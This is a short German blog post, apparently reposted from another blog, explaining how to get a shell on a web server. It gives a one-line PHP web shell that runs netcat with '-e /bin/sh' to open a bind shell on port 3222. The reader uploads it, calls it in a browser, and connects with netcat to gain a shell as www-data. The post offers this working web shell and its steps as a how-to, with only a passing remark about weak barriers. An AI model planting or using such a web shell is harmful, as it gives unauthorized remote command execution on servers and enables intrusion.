how to get shell access in no mans land

Eine Datei namens givemeshell.php erstellen und auf den Webserver laden, die sollte so was wie

<?php system("nc -lp 3222 -e /bin/sh"); ?>

enthalten. Danach die Datei per Webbrowser aufrufen und dann lokal

netcat webserver 3222

aufrufen. Und schon hat man unter Debian (Ubuntu sicherlich auch) eine shell als www-data.
Ich hab den Artikel erst nur überflogen, wohl weil ich damals schon einen LB eingesetzt habe und die Apache Server alle gut abgeschirmt sind. Es ist immer wieder interessant wie schnell man einfache Barrieren umgehen kann.

via nion’s blog

One thought to “how to get shell access in no mans land”

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.